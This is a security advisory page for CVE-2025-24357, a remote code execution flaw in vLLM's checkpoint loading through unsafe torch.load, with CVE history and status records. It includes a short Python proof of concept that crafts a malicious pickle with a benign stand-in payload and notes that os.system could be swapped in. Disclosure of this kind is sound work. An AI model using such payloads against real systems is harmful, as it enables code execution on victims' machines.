vLLM is a library for LLM inference and serving. `vllm/model_executor/weight_utils.py` implements `hf_model_weights_iterator` to load model checkpoints downloaded from Hugging Face. It calls `torch.load`, whose `weights_only` parameter defaults to `False`; in that mode, `torch.load` deserializes arbitrary pickle data, so a malicious checkpoint can execute arbitrary code during unpickling. This vulnerability is fixed in v0.7.0.
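The root cause is standard pickle behavior, which `torch.load` delegates to when `weights_only=False`. The sketch below illustrates the attack class with plain `pickle` rather than an actual vLLM or PyTorch call: any object can define `__reduce__` to make the unpickler invoke an arbitrary callable, so simply loading an attacker-supplied "checkpoint" runs attacker-chosen code. The class and file names here are illustrative, not taken from the vLLM codebase.

```python
import os
import pickle
import tempfile

# pickle lets any object define __reduce__, which instructs the unpickler
# to call an arbitrary callable during deserialization. torch.load with
# weights_only=False runs this same pickle machinery on the checkpoint
# file, so a crafted model file executes code the moment it is loaded.
class MaliciousCheckpoint:
    def __reduce__(self):
        # Benign stand-in for attacker-controlled code; a real payload
        # could instead return (os.system, ("<arbitrary shell command>",)).
        return (eval, ("6 * 7",))

path = os.path.join(tempfile.mkdtemp(), "pytorch_model.bin")
with open(path, "wb") as f:
    pickle.dump(MaliciousCheckpoint(), f)

# Merely loading the file runs the payload; no attribute access is needed.
with open(path, "rb") as f:
    loaded = pickle.load(f)

print(loaded)  # 42 -- proof the embedded expression was evaluated
```

Passing `weights_only=True` to `torch.load` switches PyTorch to a restricted unpickler that only reconstructs tensors and a small allowlist of types, rejecting payloads like the one above; loading checkpoints in a safe format such as safetensors avoids pickle entirely.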
History
Fri, 27 Jun 2025 20:00:00 +0000
Type | Values Removed | Values Added |
---|---|---|
First Time appeared | | Vllm, Vllm vllm |
CPEs | | cpe:2.3:a:vllm:vllm:*:*:*:*:*:*:*:* |
Vendors & Products | | Vllm, Vllm vllm |
Fri, 07 Feb 2025 14:30:00 +0000
Type | Values Removed | Values Added |
---|---|---|
References | | |
Metrics | threat_severity | threat_severity |
Mon, 27 Jan 2025 17:45:00 +0000
Type | Values Removed | Values Added |
---|---|---|
Description | | vLLM is a library for LLM inference and serving. vllm/model_executor/weight_utils.py implements hf_model_weights_iterator to load the model checkpoint, which is downloaded from huggingface. It uses the torch.load function and the weights_only parameter defaults to False. When torch.load loads malicious pickle data, it will execute arbitrary code during unpickling. This vulnerability is fixed in v0.7.0. |
Title | | vLLM allows a malicious model RCE by torch.load in hf_model_weights_iterator |
Weaknesses | | CWE-502 |
References | | |
Metrics | | cvssV3_1 |

Status: PUBLISHED
Assigner: GitHub_M
Published:
Updated: 2025-02-12T20:41:36.324Z
Reserved: 2025-01-20T15:18:26.988Z
Link: CVE-2025-24357

No data.

Status: Analyzed
Published: 2025-01-27T18:15:41.523
Modified: 2025-06-27T19:30:59.223
Link: CVE-2025-24357
